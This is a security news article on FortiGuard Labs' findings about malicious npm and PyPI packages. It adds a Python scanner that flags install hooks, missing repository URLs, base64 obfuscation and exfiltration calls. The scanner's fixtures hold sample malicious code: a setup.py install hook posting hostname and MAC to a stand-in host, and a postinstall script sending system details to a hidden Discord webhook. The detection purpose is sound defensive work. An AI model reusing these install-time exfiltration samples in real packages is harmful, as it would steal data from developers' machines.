Cyber Security News

Hackers Compromise Windows Systems Using 5000+ Malicious Packages

A recent analysis by FortiGuard Labs has revealed a significant increase in malicious software packages, with over 5,000 identified since November 2024.

These packages rely on evasion techniques and on code that runs at install time on the systems that pull them in, posing a substantial threat to Windows developer systems and other software environments.

The traits FortiGuard flagged include very low file counts, suspicious install scripts, and missing repository URLs. None of these is conclusive on its own, which is why signature-based security measures struggle to catch these packages; together they are a strong reason to review a package before trusting it.

Low file count for the NPM package xeno.dll v1.0.2

Malicious Software Packages on the Rise

The 1,082 low-file-count packages typically ship a minimal amount of code, just enough to carry out the harmful action, which leaves scanners and reviewers little to inspect.

Low file count for the PyPI package AffineQuant v99.6

These packages may override package-manager commands so that installation itself triggers the payload, hide strings and code behind base64 encoding, and exhibit behaviour that FortiGuard's machine-learning classifiers flag as suspicious.

Additionally, 1,052 packages embed suspicious install scripts that run malicious code silently during installation, a stage that most security checks do not cover.

According to the FortiGuard Labs report, these scripts modify the standard installation process to perform harmful actions without the user's knowledge, such as exfiltrating data via HTTP POST requests or making suspicious API calls.

Emerging Threats and Attack Cases

Among the highlighted attack cases, malicious Python packages such as AffineQuant-99.6 and amzn-aws-glue-ml-libs-python-6.1.5 use their setup files, the code pip runs at install time, to collect system information, including MAC addresses and hostnames, and send it to attacker-controlled servers.

These cases underscore the risk developers take when installing unvetted packages: the collected system data lets attackers target the machine, steal credentials, and mount further attacks.

Another notable case involves a malicious Node.js script that secretly collects sensitive information from a victim’s machine and sends it to an external server via a Discord webhook.

This script retrieves internal and external IP addresses, system details, and user information, which lets attackers fingerprint and track the victim's machine for follow-on exploitation.
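As an added example, not FortiGuard's or Fortinet's code, the script below turns the traits described above (low file count, install-time scripts, missing repository URL, base64 obfuscation) and the behaviours in the two attack cases (host fingerprinting, HTTP POST exfiltration, Discord webhooks) into a heuristic triage check over an unpacked package directory. The file-count threshold, the indicator patterns, and the three fixture packages are constructed assumptions; the malicious fixtures are strings that get scanned, never executed, and use reserved `.invalid` hostnames.

```python
"""Heuristic triage of an unpacked package for the traits FortiGuard describes (low file count,
install hooks, no repository URL, base64 obfuscation, fingerprint/exfil calls). Added example,
not Fortinet code; the threshold, patterns and fixtures are constructed for this demo."""
import base64
import json
import re
import tempfile
from pathlib import Path

INSTALL_HOOKS = {"preinstall", "install", "postinstall", "prepare"}  # run by npm install
# A setup.py that swaps in its own setuptools command runs code during pip install.
SETUP_HOOK_RE = re.compile(r"cmdclass\s*=|class\s+\w+\(\s*(install|develop|egg_info)\s*\)")
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
DECODE_CALLS = ("b64decode", "atob(", "Buffer.from(")
INDICATORS = {
    "discord_webhook": re.compile(r"discord(?:app)?\.com/api/webhooks/"),
    "http_post": re.compile(r"urlopen\(|requests\.post\(|method:\s*['\"]POST['\"]|https?\.request\(|fetch\("),
    "host_fingerprint": re.compile(r"uuid\.getnode\(|socket\.gethostname\(|os\.hostname\(|os\.networkInterfaces\("),
}
TEXT_SUFFIXES = {".py", ".js", ".mjs", ".cjs", ".ts", ".json"}

def _decoded_runs(text: str):
    # Decode base64-looking runs so an indicator hidden behind an encode step is still matched.
    for m in B64_RUN_RE.finditer(text):
        try:
            yield base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue

def scan_package(root: Path, low_file_threshold: int = 3) -> list[str]:
    """Return 'trait:detail' findings; several together warrant a manual review."""
    findings = []
    files = sorted(p for p in root.rglob("*") if p.is_file())
    if len(files) <= low_file_threshold:
        findings.append(f"low_file_count:{len(files)}")
    if (root / "package.json").exists():
        manifest = json.loads((root / "package.json").read_text())
        hooks = INSTALL_HOOKS & set(manifest.get("scripts", {}))
        if hooks:
            findings.append("npm_install_hook:" + ",".join(sorted(hooks)))
        if not manifest.get("repository"):
            findings.append("missing_repository_url")
    if (root / "setup.py").exists():
        setup_src = (root / "setup.py").read_text()
        if SETUP_HOOK_RE.search(setup_src):
            findings.append("setup_py_install_override")
        if not re.search(r"\burl\s*=\s*['\"]https?://", setup_src):
            findings.append("missing_repository_url")
    for path in files:
        if path.suffix not in TEXT_SUFFIXES:
            continue
        rel, src = path.relative_to(root).as_posix(), path.read_text(errors="replace")
        if any(c in src for c in DECODE_CALLS) and B64_RUN_RE.search(src):
            findings.append(f"base64_obfuscation:{rel}")
        for name, pattern in INDICATORS.items():
            if pattern.search(src):
                findings.append(f"{name}:{rel}")
            elif any(pattern.search(d) for d in _decoded_runs(src)):
                findings.append(f"encoded_{name}:{rel}")
    return findings

# Constructed fixtures, scanned as text and never executed: a setup.py install override that
# POSTs hostname and MAC, an npm postinstall script with a base64-hidden Discord webhook, and
# a benign package with a repository URL and no install hooks. Hostnames use a reserved TLD.
PYPI_SETUP = '''
import setuptools, socket, uuid, urllib.request
from setuptools.command.install import install
class Hooked(install):
    def run(self):
        install.run(self)
        report = f"{socket.gethostname()}:{uuid.getnode():x}".encode()
        urllib.request.urlopen("http://collector.invalid/x", data=report)  # data= makes it a POST
setuptools.setup(name="sample-pkg", version="0.0.1", cmdclass={"install": Hooked})
'''
WEBHOOK_B64 = base64.b64encode(b"https://discord.com/api/webhooks/0/constructed").decode()
NPM_MANIFEST = {"name": "sample-dll", "version": "0.0.1", "scripts": {"postinstall": "node index.js"}}
NPM_INDEX = f'''
const os = require("os");
const hook = Buffer.from("{WEBHOOK_B64}", "base64").toString();
const info = {{ host: os.hostname(), ifaces: os.networkInterfaces(), user: os.userInfo() }};
fetch(hook, {{ method: "POST", body: JSON.stringify({{ content: JSON.stringify(info) }}) }});
'''
BENIGN_MANIFEST = {"name": "tidy-lib", "version": "2.3.0", "scripts": {"test": "node test/run.js"},
                   "repository": {"type": "git", "url": "https://example.invalid/tidy-lib.git"}}
FIXTURES = {
    "pypi_sample": {"setup.py": PYPI_SETUP},
    "npm_sample": {"package.json": json.dumps(NPM_MANIFEST), "index.js": NPM_INDEX},
    "benign": {"package.json": json.dumps(BENIGN_MANIFEST), "lib/index.js": 'module.exports = require("./util");\n',
               "lib/util.js": "exports.add = (a, b) => a + b;\n", "test/run.js": 'require("../lib");\n'},
}

def demo() -> dict[str, list[str]]:
    """Write the fixtures to a temp dir, scan each, and return findings per sample."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        for name, files in FIXTURES.items():
            root = Path(tmp) / name
            for rel, body in files.items():
                (root / rel).parent.mkdir(parents=True, exist_ok=True)
                (root / rel).write_text(body)
            results[name] = scan_package(root)
    return results
```

Point `scan_package` at a directory extracted from `npm pack` or `pip download` output and treat the result as triage signals rather than a verdict: a `postinstall` hook or a `fetch(` call is common in legitimate packages, and a single hit should prompt a review, not a block. Decoding base64 runs before matching is what catches the webhook URL in the npm fixture, which the plain regex misses; the benign fixture produces no findings.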

To protect against these emerging threats, it is crucial for organizations and individuals to stay informed about the latest threats and implement proactive defense measures.

This includes regular system updates, advanced threat detection tools, and user education on identifying suspicious activity. For the tactics described here, it also means reviewing new dependencies before adding them, leaving install-time scripts disabled unless a package genuinely needs them, and treating very small, repository-less packages with install hooks as suspicious until checked.

Fortinet’s FortiGuard AntiVirus service detects and protects against these malicious files, while the FortiDevSec SCA scanner identifies and prevents malicious dependencies from being introduced into projects.

By adopting robust security strategies, users can mitigate the risks associated with these malicious packages and safeguard their systems from potential attacks.


Aman Mishra

Aman Mishra is a security and privacy reporter covering data breaches, cyber crime, malware, and vulnerabilities.
